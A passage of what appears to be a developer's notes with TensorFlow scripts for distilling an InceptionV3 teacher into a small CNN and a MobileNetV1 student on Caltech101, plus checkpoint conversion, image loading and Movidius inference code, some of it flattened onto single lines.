                         stu_keep_prob_conv: 0.8,
                         stu_keep_prob_hidden: 0.5}
            #loss, _ = sess.run(stu_loss, feed_dict=feed_dict)
            train_step_student.run(feed_dict=feed_dict)

        ## EVALUATE
        val_accuracy = []
        for step in tqdm(range(steps_per_epoch_val)):
            # EXTRACT A BATCH OF TEST DATA
            X_batch = X_test[batch_size*step: batch_size*(step+1)]
            Y_batch = Y_test[batch_size*step: batch_size*(step+1)]

            # Evaluation
            feed_dict = {tf_X: X_batch,
                         tf_Y: Y_batch,
                         #tf_alpha:0.001,
                         stu_keep_prob_conv: 1.0,
                         stu_keep_prob_hidden: 1.0}
            val_accuracy.append(stu_accuracy.eval(feed_dict=feed_dict))

        # PRINT FEED BACK - once every `print_every` steps
        total_val_accuracy = np.average(np.asarray(val_accuracy))
        pre_logits, pre_loss = sess.run([stu_logits, stu_loss],
                                        feed_dict = {
                                            tf_X: X_batch,
                                            tf_Y: Y_batch,
                                            #tf_alpha:0.001,
                                            stu_keep_prob_conv: 1.0,
                                            stu_keep_prob_hidden: 1.0
                                        })
        print("\tloss: {:0.4f} val accuracy: {:0.4f}".format(pre_loss, total_val_accuracy))
        plt.plot(pre_logits[0])
        plt.show()

        stu_saver.save(sess, STU_SNAPSHOT_FILE)

# In[ ]:

end = time.time()
print("Time : {0}".format(end-start))
For conversion
#!/usr/bin/env python
# coding: utf-8

# In[1]:

import os,time,glob
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "0"

import tensorflow as tf
import numpy as np
import tensorflow.contrib.slim as slim

# In[2]:

STU_SNAPSHOT_FILE = "./models/student_snapshot.ckpt"
STU_FLOZEN_FILE = "./models/student_flozen.ckpt"

# somewhere to store the tensorboard files - to visualise the graph
TENSORBOARD_DIR = "logs"
[os.remove(i) for i in glob.glob(os.path.join(TENSORBOARD_DIR, '*.nanase'))]

# IMAGE SETTINGS
IMG_WIDTH, IMG_HEIGHT = [299,299] # Dimensions required by inception V3
N_CHANNELS = 3                    # Number of channels required by inception V3
N_CLASSES = 101                   # Change N_CLASSES to suit your needs

temperature = 4

# In[3]:

# Same student network as in training, with the dropout layers removed.
def NetworkStudent(input,scope='Student', reuse = False):
    with tf.variable_scope(scope, reuse = reuse) as sc:
        with slim.arg_scope([slim.conv2d],
                            kernel_size = [3,3],
                            stride = [1,1],
                            biases_initializer=tf.constant_initializer(0.0),
                            activation_fn=tf.nn.relu):
            net = slim.conv2d(input, 32, scope='conv1')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool1')

            net = slim.conv2d(net, 64,scope='conv2')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool2')

            net = slim.conv2d(net, 128,scope='conv3')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool3')

            net = slim.conv2d(net, 256,scope='conv4')
            net = slim.max_pool2d(net,[2, 2], 2, scope='pool4')

            net = slim.flatten(net)
        with slim.arg_scope([slim.fully_connected],
                            biases_initializer=tf.constant_initializer(0.0),
                            activation_fn=tf.nn.relu) :
            net = slim.fully_connected(net,1000,scope='fc1') # 625
            net = slim.fully_connected(net,N_CLASSES,activation_fn=None,scope='fc2')
            #net = tf.nn.softmax(net/temperature)
            return net

# In[4]:

graph = tf.Graph()
with graph.as_default():
    # INPUTS
    with tf.name_scope("inputs") as scope:
        input_dims = (None, IMG_HEIGHT, IMG_WIDTH, N_CHANNELS)
        tf_X = tf.placeholder(tf.float32, shape=input_dims, name="X")

    # PREPROCESSING STEPS
    with tf.name_scope("preprocess") as scope:
        scaled_inputs = tf.div(tf_X, 255., name="rescaled_inputs")

    # Student
    stu_logits = NetworkStudent(tf_X, scope='student')
    with tf.name_scope("stu_struct"):
        # softmax
        stu_y = tf.nn.softmax(stu_logits/temperature, name="softmax")
        stu_y_actual = tf.nn.softmax(stu_logits, name="actual_softmax")

    # Separate vars
    model_vars = tf.trainable_variables()
    var_student = [var for var in model_vars if 'student' in var.name]

    # Count the trainable parameters
    total_parameters = 0
    for variable in tf.trainable_variables():
        # shape is an array of tf.Dimension
        shape = variable.get_shape()
        #print(shape)
        #print(len(shape))
        variable_parameters = 1
        for dim in shape:
            #print(dim)
            variable_parameters *= dim.value
        #print(variable_parameters)
        total_parameters += variable_parameters
    print("total params: ",total_parameters)

    # STUDENT SAVER
    stu_saver = tf.train.Saver(var_student, name="stu_saver")

    # TENSORBOARD - To visualize the architecture
    with tf.variable_scope('tensorboard') as scope:
        tf_summary_writer = tf.summary.FileWriter(TENSORBOARD_DIR, graph=graph)
        tf_dummy_summary = tf.summary.scalar(name="dummy", tensor=1)

# In[5]:

# Restore the trained student and save it again from the inference-only graph.
with tf.Session(graph=graph) as sess:
    sess.run(tf.global_variables_initializer())
    sess.run(tf.local_variables_initializer())

    stu_saver.restore(sess, STU_SNAPSHOT_FILE)
    stu_saver.save(sess, STU_FLOZEN_FILE)
For prediction on Movidius
import mvnc.mvncapi as mvnc
import numpy as np
from PIL import Image
import cv2
import time, sys, os
import glob

IMAGE_DIR_NAME = '/home/tokunn/caltech101'
if (len(sys.argv) > 1):
    IMAGE_DIR_NAME = sys.argv[1]
#IMAGE_DIR_NAME = 'github_deep_mnist/ncappzoo/data/digit_images'

def predict(input):
    print("Start predicting ...")
    devices = mvnc.EnumerateDevices()
    device = mvnc.Device(devices[0])
    device.OpenDevice()

    # Load graph file data
    with open('./models/graph', 'rb') as f:
        graph_file_buffer = f.read()

    # Initialize a Graph object
    graph = device.AllocateGraph(graph_file_buffer)

    start = time.time()
    for i in range(len(input)):
        # Write the tensor to the input_fifo and queue an inference
        graph.LoadTensor(input[i], None)
        output, userobj = graph.GetResult()
        print(np.argmax(output), end=' ')
    stop = time.time()
    print('')
    print("Time : {0} ({1} images)".format(stop-start, len(input)))

    graph.DeallocateGraph()
    device.CloseDevice()
    return output

if __name__ == '__main__':
    print("Image path : {0}".format(os.path.join(IMAGE_DIR_NAME, '*.jpg or *.png')))
    jpg_list = glob.glob(os.path.join(IMAGE_DIR_NAME, '*.jpg'))
    jpg_list += glob.glob(os.path.join(IMAGE_DIR_NAME, '*.png'))
    if not len(jpg_list):
        print("No image file")
        sys.exit()
    jpg_list.reverse()
    print([i.split('/')[-1] for i in jpg_list][:10])

    # Load every image, convert it to grayscale and resize it
    img_list = []
    for n in jpg_list:
        image = cv2.imread(n)
        image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
        image = cv2.resize(image, (299, 299))
        img_list.append(image)
    img_list = np.asarray(img_list)# * (1.0/255.0)
    #img_list = np.reshape(img_list, [-1, 784])
    print("imgshape ", img_list.shape)

    predict(img_list.astype(np.float16))
InceptionV3 to MobilenetV1 edition
Teacher and student
#!/usr/bin/env python # coding: utf-8 # In[1]: import os,time,glob,sys #sys.path.append('/home/tokunn/sources/models/research/slim') os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" os.environ["CUDA_VISIBLE_DEVICES"] = "0" import tensorflow as tf import numpy as np import tensorflow.contrib.slim as slim import tensorflow.contrib.slim.nets import nets.mobilenet_v1 #from __future__ import print_function, division import loadimg_caltech as loadimg from tqdm import tqdm import matplotlib.pyplot as plt start = time.time() # In[2]: np_aryname = './models/data{0}.npy' try: # LOAD X_train = np.load(np_aryname.format('X_train')) Y_train = np.load(np_aryname.format('Y_train')) X_test = np.load(np_aryname.format('X_test')) Y_test = np.load(np_aryname.format('Y_test')) number_of_classes = np.asscalar(np.load(np_aryname.format('number_of_classes'))) except FileNotFoundError: print("### Load from Images ###") X_train, Y_train, X_test, Y_test, number_of_classes = loadimg.loadimg( '/home/tokunn/caltech101') np.save(np_aryname.format('X_train'), X_train) np.save(np_aryname.format('Y_train'), Y_train) np.save(np_aryname.format('X_test'), X_test) np.save(np_aryname.format('Y_test'), Y_test) np.save(np_aryname.format('number_of_classes'), number_of_classes) print("X_train", X_train.shape) print("Y_train", Y_train.shape) print("X_test", X_test.shape) print("Y_test", Y_test.shape) print("Number of Classes", number_of_classes) # In[3]: SNAPSHOT_FILE = "./models/snapshot.ckpt" #STU_SNAPSHOT_FILE = "./models/student_snapshot.ckpt" MBNET_SNAPSHOT_FILE = "./models/mbnet_student_snapshot.ckpt" PRETRAINED_SNAPSHOT_FILE = "./models/inception_v3.ckpt" PRETRAINED_MOBILENET_FILE = "./models/mobilenet/mobilenet_v1_1.0_224.ckpt" # somewhere to store the tensorboard files - to visualise the graph TENSORBOARD_DIR = "logs" [os.remove(i) for i in glob.glob(os.path.join(TENSORBOARD_DIR, '*.nanase'))] # IMAGE SETTINGS IMG_WIDTH, IMG_HEIGHT = [224,224] # Dimensions required by inception V3 N_CHANNELS = 3 # 
Number of channels required by inception V3 N_CLASSES = number_of_classes # Change N_CLASSES to suit your needs temperature = 20 # In[4]: def NetworkStudent2(input,scope='Student', tf_is_training=False, reuse = False): #with tf.variable_scope(scope, reuse = reuse) as sc: arg_scope = nets.mobilenet_v1.mobilenet_v1_arg_scope() with tf.contrib.framework.arg_scope(arg_scope): stu2_logits, stu2_end_points = nets.mobilenet_v1.mobilenet_v1( scaled_inputs, num_classes=N_CLASSES, is_training=tf_is_training)#, #depth_multiplier=1.0) return stu2_logits, stu2_end_points # In[5]: # def NetworkStudent(input,keep_prob_conv,keep_prob_hidden,scope='Student', reuse = False): # with tf.variable_scope(scope, reuse = reuse) as sc: # with slim.arg_scope([slim.conv2d], # kernel_size = [3,3], # stride = [1,1], # biases_initializer=tf.constant_initializer(0.0), # activation_fn=tf.nn.relu): # net = slim.conv2d(input, 32, scope='conv1') # net = slim.max_pool2d(net,[2, 2], 2, scope='pool1') # net = tf.nn.dropout(net, keep_prob_conv) # net = slim.conv2d(net, 64,scope='conv2') # net = slim.max_pool2d(net,[2, 2], 2, scope='pool2') # net = tf.nn.dropout(net, keep_prob_conv) # net = slim.conv2d(net, 128,scope='conv3') # net = slim.max_pool2d(net,[2, 2], 2, scope='pool3') # net = tf.nn.dropout(net, keep_prob_conv) # net = slim.conv2d(net, 256,scope='conv4') # net = slim.max_pool2d(net,[2, 2], 2, scope='pool4') # net = tf.nn.dropout(net, keep_prob_conv) # net = slim.flatten(net) # with slim.arg_scope([slim.fully_connected], # biases_initializer=tf.constant_initializer(0.0), # activation_fn=tf.nn.relu) : # net = slim.fully_connected(net,1000,scope='fc1') # 625 # net = tf.nn.dropout(net, keep_prob_hidden) # net = slim.fully_connected(net,N_CLASSES,activation_fn=None,scope='fc2') # #net = tf.nn.softmax(net/temperature) # return net # In[6]: def loss(prediction,output):#,temperature = 1): cross_entropy = tf.reduce_mean(-tf.reduce_sum( tf.cast(output, tf.float32) * 
tf.log(tf.clip_by_value(prediction,1e-10,1.0)), reduction_indices=[1])) #correct_prediction = tf.equal(tf.argmax(prediction,1), tf.argmax(output,1)) #accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) return cross_entropy#,accuracy # In[7]: graph = tf.Graph() with graph.as_default(): # INPUTS with tf.name_scope("inputs") as scope: input_dims = (None, IMG_HEIGHT, IMG_WIDTH, N_CHANNELS) tf_X = tf.placeholder(tf.float32, shape=input_dims, name="X") tf_Y = tf.placeholder(tf.int32, shape=[None, N_CLASSES], name="Y") tf_alpha = tf.placeholder_with_default(0.001, shape=None, name="alpha") tf_is_training = tf.placeholder_with_default(False, shape=None, name="is_training") stu_keep_prob_conv = tf.placeholder(tf.float32) stu_keep_prob_hidden = tf.placeholder(tf.float32) # PREPROCESSING STEPS with tf.name_scope("preprocess") as scope: #scaled_inputs = tf.div(tf_X, 255., name="rescaled_inputs") scaled_inputs = tf_X # BODY arg_scope = tf.contrib.slim.nets.inception.inception_v3_arg_scope() with tf.contrib.framework.arg_scope(arg_scope): tf_logits, end_points = tf.contrib.slim.nets.inception.inception_v3( scaled_inputs, num_classes=N_CLASSES, is_training=tf_is_training, dropout_keep_prob=0.8) with tf.name_scope("softmax") as scope: tch_y = tf.nn.softmax(tf_logits/temperature, name="teacher_softmax") tch_y_actual = tf.nn.softmax(tf_logits, name="teacher_softmax_actual") # Student # stu_logits = NetworkStudent(scaled_inputs, stu_keep_prob_conv, # stu_keep_prob_hidden, scope='student') # with tf.name_scope("stu_struct"): # # softmax # stu_y = tf.nn.softmax(stu_logits/temperature, name="softmax") # stu_y_actual = tf.nn.softmax(stu_logits, name="actual_softmax") mbnet_logits, mbnet_end_point = NetworkStudent2( scaled_inputs, tf_is_training=tf_is_training, scope='mbnet') with tf.name_scope("mbnet_struct"): # softmax mbnet_y = tf.nn.softmax(mbnet_logits/temperature, name="softmax") mbnet_y_actual = tf.nn.softmax(mbnet_logits, name="actual_softmax") # Seperate vars 
model_vars = tf.trainable_variables() var_teacher = [var for var in model_vars if 'InceptionV3' in var.name] #var_student = [var for var in model_vars if 'student' in var.name] save_vars = tf.global_variables() var_mbnet = [var for var in save_vars if 'MobilenetV1' in var.name] # PREDICTIONS tf_preds = tf.to_int32(tf.argmax(tf_logits, axis=-1), name="preds") # LOSS - Sums all losses (even Regularization losses) with tf.variable_scope('loss') as scope: #unrolled_labels = tf.reshape(tf_Y, (-1,)) #tf.losses.softmax_cross_entropy(onehot_labels=unrolled_labels, #tf.losses.softmax_cross_entropy(onehot_labels=tf_Y, logits=tf_logits) #tf_loss = tf.losses.get_total_loss() tf_loss = loss(tch_y_actual, tf_Y) # OPTIMIZATION - Also updates batchnorm operations automatically with tf.variable_scope('opt') as scope: #tf_optimizer = tf.train.AdamOptimizer(tf_alpha, name="optimizer") #update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) # for batchnorm #with tf.control_dependencies(update_ops): # tf_train_op = tf_optimizer.minimize(tf_loss, name="train_op") grad_teacher = tf.gradients(tf_loss, var_teacher) tf_trainer = tf.train.AdamOptimizer(tf_alpha, name="optimizer") tf_train_step = tf_trainer.apply_gradients(zip(grad_teacher, var_teacher)) # Evaluation with tf.variable_scope('eval') as scope: y = tf.nn.softmax(tf_logits, name='softmax') accuracy = tf.reduce_mean( tf.cast(tf.equal(tf.argmax(y, 1), tf.argmax(tf_Y, 1)), tf.float32) ) # PRETRAINED SAVER SETTINGS # Lists of scopes of weights to include/exclude from pretrained snapshot pretrained_include = ["InceptionV3"] pretrained_exclude = ["InceptionV3/AuxLogits", "InceptionV3/Logits"] # PRETRAINED SAVER - For loading pretrained weights on the first run pretrained_vars = tf.contrib.framework.get_variables_to_restore( include=pretrained_include, exclude=pretrained_exclude) tf_pretrained_saver = tf.train.Saver(pretrained_vars, name="pretrained_saver") mbnet_pretrained_include = ["MobilenetV1"] mbnet_pretrained_exclude = 
["MobilenetV1/Predictions", "MobilenetV1/Logits"] mbnet_pretrained_vars = tf.contrib.framework.get_variables_to_restore( include=mbnet_pretrained_include, exclude=mbnet_pretrained_exclude) mbnet_pretrained_saver = tf.train.Saver( mbnet_pretrained_vars, name="mobilenet_pretrained_saver") # Student # with tf.name_scope("stu_train"): # # loss # #tf.losses.softmax_cross_entropy(onehot_labels=tf_Y, logits=stu_logits) # #stu_loss1 = tf.losses.get_total_loss() # stu_loss1 = loss(stu_y_actual, tf_Y) # stu_loss2 = tf.reduce_mean(- tf.reduce_sum(tch_y * tf.log( # tf.clip_by_value(stu_y, 1e-10,1.0)), reduction_indices=1)) # stu_loss = 0.4 * stu_loss1 + stu_loss2 # #stu_loss = stu_loss1 # # optimization # grad_student = tf.gradients(stu_loss,var_student) # stu_trainer = tf.train.RMSPropOptimizer(learning_rate = 0.0002) # #stu_trainer = tf.train.AdamOptimizer(tf_alpha, name="optimizer") # #stu_trainer = tf.train.AdadeltaOptimizer() # train_step_student = stu_trainer.apply_gradients(zip(grad_student, var_student)) # #stu_optimizer = tf.train.AdamOptimizer(tf_alpha, name="stu_optimizer") # #stu_train_op = tf_optimizer.minimize(stu_loss, name="stu_train_op") # # evaluation # stu_accuracy = tf.reduce_mean( # tf.cast(tf.equal(tf.argmax(stu_y_actual, 1), tf.argmax(tf_Y, 1)), tf.float32) # ) # Mobilenet V1 with tf.name_scope("mbnet_train"): # loss #tf.losses.softmax_cross_entropy(onehot_labels=tf_Y, logits=mbnet_logits) #mbnet_loss1 = tf.losses.get_total_loss() mbnet_loss1 = loss(mbnet_y_actual, tf_Y) mbnet_loss2 = tf.reduce_mean(- tf.reduce_sum(tch_y * tf.log( tf.clip_by_value(mbnet_y, 1e-10,1.0)), reduction_indices=1)) mbnet_loss = 0.4 * mbnet_loss1 + mbnet_loss2 #mbnet_loss = mbnet_loss1 # optimization grad_mbnet = tf.gradients(mbnet_loss,var_mbnet) mbnet_trainer = tf.train.RMSPropOptimizer(learning_rate = 0.0002) train_step_mbnet = mbnet_trainer.apply_gradients(zip(grad_mbnet, var_mbnet)) # evaluation mbnet_accuracy = tf.reduce_mean( tf.cast(tf.equal( tf.argmax(mbnet_y_actual, 1), 
tf.argmax(tf_Y, 1)), tf.float32) ) # MAIN SAVER - For saving/restoring your complete model tf_saver = tf.train.Saver(var_teacher, name="saver") # STUDENT SAVER #stu_saver = tf.train.Saver(var_student, name="stu_saver") mbnet_saver = tf.train.Saver(var_mbnet, name="mbnet_saver") # TENSORBOARD - To visialize the architecture with tf.variable_scope('tensorboard') as scope: tf_summary_writer = tf.summary.FileWriter(TENSORBOARD_DIR, graph=graph) tf_dummy_summary = tf.summary.scalar(name="dummy", tensor=1) # In[8]: def initialize_vars(session): # INITIALIZE VARS LOAD_FROM_CHECKPOINT = False if LOAD_FROM_CHECKPOINT: #tf.train.checkpoint_exists(SNAPSHOT_FILE): print(" Loading from Main Checkpoint") session.run(tf.global_variables_initializer()) tf_saver.restore(session, SNAPSHOT_FILE) else: print("Initializing from Pretrained Weights") session.run(tf.global_variables_initializer()) tf_pretrained_saver.restore(session, PRETRAINED_SNAPSHOT_FILE) mbnet_pretrained_saver.restore(session, PRETRAINED_MOBILENET_FILE) # In[9]: with tf.Session(graph=graph) as sess: n_epochs = 2 batch_size = 32 # small batch size so inception v3 can be run on laptops steps_per_epoch = len(X_train)//batch_size steps_per_epoch_val = len(X_test)//batch_size initialize_vars(session=sess) """ try: print("#### Debuggin Section ####") ep2 = sess.run(stu2_end_point, feed_dict = {tf_X: [X_train[0]], tf_Y: [Y_train[0]], tf_is_training: True}) print("EP2 : ", ep2.keys()) print("shape of logits: ", ep2['Logits'].shape) print("shape of prediction: ", ep2['Predictions'].shape) #print("pretrained_vars: ", mbnet_pretrained_vars)""" print("##### Teacher Training Section #####") for epoch in range(n_epochs): print("----------------------------------------------", flush=True) print("EPOCH {}/{}".format(epoch+1, n_epochs), flush=True, end=' ') ## TRAINING for step in tqdm(range(steps_per_epoch)): # EXTRACT A BATCH OF TRAINING DATA X_batch = X_train[batch_size*step: batch_size*(step+1)] Y_batch = Y_train[batch_size*step: 
batch_size*(step+1)] # RUN ONE TRAINING STEP - feeding batch of data feed_dict = {tf_X: X_batch, tf_Y: Y_batch, tf_alpha:0.0001, tf_is_training: True} #loss, _ = sess.run([tf_loss, tf_train_op], feed_dict=feed_dict) tf_train_step.run(feed_dict=feed_dict) ## EVALUATE val_accuracy = [] for step in tqdm(range(steps_per_epoch_val)): # EXTRACT A BATCH OF TEST DATA X_batch = X_test[batch_size*step: batch_size*(step+1)] Y_batch = Y_test[batch_size*step: batch_size*(step+1)] # Evalution feed_dict = {tf_X: X_batch, tf_Y: Y_batch, tf_alpha:0.0001, tf_is_training: False} val_accuracy.append(accuracy.eval(feed_dict=feed_dict)) # PRINT FEED BACK - once every `print_every` steps total_val_accuracy = np.average(np.asarray(val_accuracy)) pre_logits, pre_loss = sess.run([tch_y, tf_loss], feed_dict = { tf_X: [X_test[5]], tf_Y: [Y_test[5]], tf_is_training: False }) print("\tloss: {:0.4f} val accuracy: {:0.4f}".format(pre_loss, total_val_accuracy)) plt.plot(pre_logits[0]) plt.show() # SAVE SNAPSHOT - after each epoch tf_saver.save(sess, SNAPSHOT_FILE) print("### Student Training Section ###") n_epochs = 30 steps_per_epoch = len(X_train)//batch_size // 3 # FOR DEBUG steps_per_epoch_val = len(X_test)//batch_size print("/////////////////////////////////////////////////////////") for epoch in range(n_epochs): print("----------------------------------------------", flush=True) print("EPOCH {}/{}".format(epoch+1, n_epochs), flush=True, end=' ') ## TRAINING for step in tqdm(range(steps_per_epoch)): # EXTRACT A BATCH OF TRAINING DATA X_batch = X_train[batch_size*step: batch_size*(step+1)] Y_batch = Y_train[batch_size*step: batch_size*(step+1)] # RUN ONE TRAINING STEP - feeding batch of data feed_dict = {tf_X: X_batch, tf_Y: Y_batch, tf_is_training: True} train_step_mbnet.run(feed_dict=feed_dict) ## EVALUATE val_accuracy = [] for step in tqdm(range(steps_per_epoch_val)): # EXTRACT A BATCH OF TEST DATA X_batch = X_test[batch_size*step: batch_size*(step+1)] Y_batch = Y_test[batch_size*step: 
batch_size*(step+1)] # Evalution feed_dict = {tf_X: X_batch, tf_Y: Y_batch, tf_is_training: False} val_accuracy.append(mbnet_accuracy.eval(feed_dict=feed_dict)) # PRINT FEED BACK - once every `print_every` steps total_val_accuracy = np.average(np.asarray(val_accuracy)) pre_logits, pre_loss = sess.run([mbnet_logits, mbnet_loss], feed_dict = { tf_X: X_batch, tf_Y: Y_batch, tf_is_training: False }) print("\tloss: {:0.4f} val accuracy: {:0.4f}".format(pre_loss, total_val_accuracy)) plt.plot(pre_logits[0]) plt.show() mbnet_saver.save(sess, MBNET_SNAPSHOT_FILE) # In[10]: end = time.time() print("Time : {0}".format(end-start)) # In[ ]: # In[ ]:
Conversion script
#!/usr/bin/env python # coding: utf-8 # In[1]: import os,time,glob,sys os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" os.environ["CUDA_VISIBLE_DEVICES"] = "0" import tensorflow as tf import numpy as np import tensorflow.contrib.slim as slim import tensorflow.contrib.slim.nets import nets.mobilenet_v1 # In[2]: MBNET_SNAPSHOT_FILE = "./models/mbnet_student_snapshot.ckpt" MBNET_FLOZEN_FILE = "./models/mbnet_flozen.ckpt" # somewhere to store the tensorboard files - to visualise the graph TENSORBOARD_DIR = "logs" [os.remove(i) for i in glob.glob(os.path.join(TENSORBOARD_DIR, '*.nanase'))] # IMAGE SETTINGS IMG_WIDTH, IMG_HEIGHT = [224,224] # Dimensions required by inception V3 N_CHANNELS = 3 # Number of channels required by inception V3 N_CLASSES = 101 # Change N_CLASSES to suit your needs temperature = 20 # In[3]: def NetworkStudent2(input,scope='Student', tf_is_training=False, reuse = False): #with tf.variable_scope(scope, reuse = reuse) as sc: arg_scope = nets.mobilenet_v1.mobilenet_v1_arg_scope() with tf.contrib.framework.arg_scope(arg_scope): stu2_logits, stu2_end_points = nets.mobilenet_v1.mobilenet_v1( scaled_inputs, num_classes=N_CLASSES, is_training=False)#, #depth_multiplier=1.0) return stu2_logits, stu2_end_points # In[4]: graph = tf.Graph() with graph.as_default(): # INPUTS with tf.name_scope("inputs") as scope: input_dims = (None, IMG_HEIGHT, IMG_WIDTH, N_CHANNELS) tf_X = tf.placeholder(tf.float32, shape=input_dims, name="X") # PREPROCESSING STEPS with tf.name_scope("preprocess") as scope: #scaled_inputs = tf.div(tf_X, 255., name="rescaled_inputs") scaled_inputs = tf_X # Student mbnet_logits, mbnet_end_point = NetworkStudent2(scaled_inputs, scope='mbnet') with tf.name_scope("mbnet_struct"): # softmax mbnet_y_actual = tf.nn.softmax(mbnet_logits, name="actual_softmax") # Seperate vars model_vars = tf.trainable_variables() var_mbnet = [var for var in model_vars if 'MobilenetV1' in var.name] # parameter total_parameters = 0 for variable in 
tf.trainable_variables(): # shape is an array of tf.Dimension shape = variable.get_shape() #print(shape) #print(len(shape)) variable_parameters = 1 for dim in shape: #print(dim) variable_parameters *= dim.value #print(variable_parameters) total_parameters += variable_parameters print("total params: ",total_parameters) # STUDENT SAVER #mbnet_saver = tf.train.Saver(var_mbnet, name="mbnet_saver") mbnet_saver = tf.train.Saver(tf.global_variables(), name="mbnet_saver") # TENSORBOARD - To visialize the architecture with tf.variable_scope('tensorboard') as scope: tf_summary_writer = tf.summary.FileWriter(TENSORBOARD_DIR, graph=graph) tf_dummy_summary = tf.summary.scalar(name="dummy", tensor=1) # In[5]: with tf.Session(graph=graph) as sess: sess.run(tf.global_variables_initializer()) sess.run(tf.local_variables_initializer()) mbnet_saver.restore(sess, MBNET_SNAPSHOT_FILE) #sess.run(tf.initialize_all_variables()) mbnet_saver.save(sess, MBNET_FLOZEN_FILE)
loadimg
#!/usr/bin/env python2 import os import numpy as np import tensorflow as tf from keras.preprocessing.image import load_img, img_to_array from keras.utils import np_utils import matplotlib.pyplot as plt import glob from sklearn.model_selection import train_test_split IMGSIZE = 224 IMGSIZE = 224 def loadimg_one(DIRPATH, NUM): x = [] y = [] img_list = os.listdir(DIRPATH) img_list = sorted(img_list) if (NUM) and (len(img_list) > NUM): img_list = img_list[:NUM] #print("[loadimg] : img_list : ", end=' ') #print(img_list) with open('categories.txt', 'w') as f: f.write('\n'.join(img_list)) f.write('\n') img_count = 0 for number in img_list: dirpath = os.path.join(DIRPATH, number) dirpic_list = glob.glob(os.path.join(dirpath, '*.jpg')) dirpic_list += glob.glob(os.path.join(dirpath, '*.png')) for picture in dirpic_list: #img = img_to_array(load_img(picture, color_mode = "grayscale", target_size=(IMGSIZE, IMGSIZE))) img = img_to_array(load_img(picture, target_size=(IMGSIZE, IMGSIZE))) x.append(img) y.append(img_count) #print("Load {0} : {1}".format(picture, img_count)) img_count += 1 output_count = img_count x = np.asarray(x) x = x.astype('float32') x = x/255.0 y = np.asarray(y, dtype=np.int32) y = np_utils.to_categorical(y, output_count) return x, y, output_count def loadimg(COMMONDIR='./', NUM=None): print("########## loadimg ########") #COMMONDIR = './make_image' #TRAINDIR = os.path.join(COMMONDIR, 'train') #TESTDIR = os.path.join(COMMONDIR, 'test') x, y, class_count = loadimg_one(COMMONDIR, NUM) #x_test, y_test, _ = loadimg_one(TESTDIR, NUM) #for i in range(0, x_test.shape[0]): # plt.imshow(x_test[i]) # plt.show() #x = np.concatenate((x_train, x_test)) #x = np.reshape(x, [-1, 784]) #y = np.concatenate((y_train, y_test)) print("x_train, y_train, x_test, y_test, class_count") print("x_train shape : ", x.shape) print("########## END of loadimg ########") x_train, x_test, y_train, y_test = train_test_split(x, y,train_size=0.8, test_size=0.2) return x_train, y_train, x_test, 
y_test, class_count if __name__ == '__main__': loadimg()
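`loadimg_one` above writes the sorted class directory names to `categories.txt`, and a class's label is simply its position in that list; the Movidius script then reads the file back to turn an argmax index into a class name. Below is a minimal sketch of that round trip using a temporary directory. The helper names `write_categories` and `read_categories` and the three class names are hypothetical, chosen only for illustration. It reads with `splitlines()`, which avoids the empty trailing entry that `split('\n')` leaves behind after the final newline.

```python
import os
import tempfile


def write_categories(names, path):
    """Write class names one per line, sorted, with a trailing newline."""
    ordered = sorted(names)
    with open(path, "w") as f:
        f.write("\n".join(ordered))
        f.write("\n")
    return ordered


def read_categories(path):
    """Read class names back; the list index is the class label."""
    with open(path) as f:
        return f.read().splitlines()


with tempfile.TemporaryDirectory() as tmp:
    path = os.path.join(tmp, "categories.txt")
    # Hypothetical class directories, deliberately given out of order.
    written = write_categories(["anchor", "accordion", "airplanes"], path)
    categories = read_categories(path)

predicted_index = 1  # stands in for np.argmax(output)
print(categories[predicted_index])
```

Because the labels depend on the sort order, the same `categories.txt` has to be shipped alongside the compiled graph.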
Movidius
import mvnc.mvncapi as mvnc
import numpy as np
from PIL import Image
import cv2
import time, sys, os
import glob

IMAGE_DIR_NAME = '/home/tokunn/caltech101'
if (len(sys.argv) > 1):
    IMAGE_DIR_NAME = sys.argv[1]
#IMAGE_DIR_NAME = 'github_deep_mnist/ncappzoo/data/digit_images'

CATEGORIES_FILE = './categories.txt'
with open(CATEGORIES_FILE, 'r') as f:
    categories = f.read().split('\n')

def predict(input):
    print("Start predicting ...")
    devices = mvnc.EnumerateDevices()
    device = mvnc.Device(devices[0])
    device.OpenDevice()

    # Load graph file data
    with open('./models/graph', 'rb') as f:
        graph_file_buffer = f.read()

    # Initialize a Graph object
    graph = device.AllocateGraph(graph_file_buffer)

    predictions = []
    start = time.time()
    for i in range(len(input)):
        # Write the tensor to the input_fifo and queue an inference
        graph.LoadTensor(input[i], None)
        output, userobj = graph.GetResult()
        predictions.append(np.argmax(output))
    stop = time.time()

    # Map each predicted index to its class name
    for i in predictions:
        print(categories[i], end=' ', flush=True)
    print('')
    print("Time : {0} ({1} images)".format(stop-start, len(input)))

    graph.DeallocateGraph()
    device.CloseDevice()
    return output

if __name__ == '__main__':
    print("Image path : {0}".format(os.path.join(IMAGE_DIR_NAME, '*.jpg or *.png')))
    jpg_list = glob.glob(os.path.join(IMAGE_DIR_NAME, '*.jpg'))
    jpg_list += glob.glob(os.path.join(IMAGE_DIR_NAME, '*.png'))
    if not len(jpg_list):
        print("No image file")
        sys.exit()
    jpg_list.reverse()
    print([i.split('/')[-1] for i in jpg_list][:10])

    img_list = []
    for n in jpg_list:
        image = cv2.imread(n)
        # The network takes 3-channel input (N_CHANNELS = 3) and was trained on
        # RGB images loaded by Keras, so convert BGR -> RGB instead of grayscale.
        image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
        image = cv2.resize(image, (224, 224))
        img_list.append(image)
    img_list = np.asarray(img_list) * (1.0/255.0)
    #img_list = np.reshape(img_list, [-1, 784])
    print("imgshape ", img_list.shape)

    predict(img_list.astype(np.float16))
Fine-Tuning InceptionV3
Fine-tune InceptionV3, pretrained on ImageNet, on Caltech101.
Fine-tuning by following the site
Reference: http://ronny.rest/blog/post_2017_10_13_tf_transfer_learning/
Let's try it.
As usual, the pretrained Inception V3 model comes from https://github.com/tensorflow/models/tree/master/research/slim ; I chose http://download.tensorflow.org/models/inception_v3_2016_08_28.tar.gz
Input and output
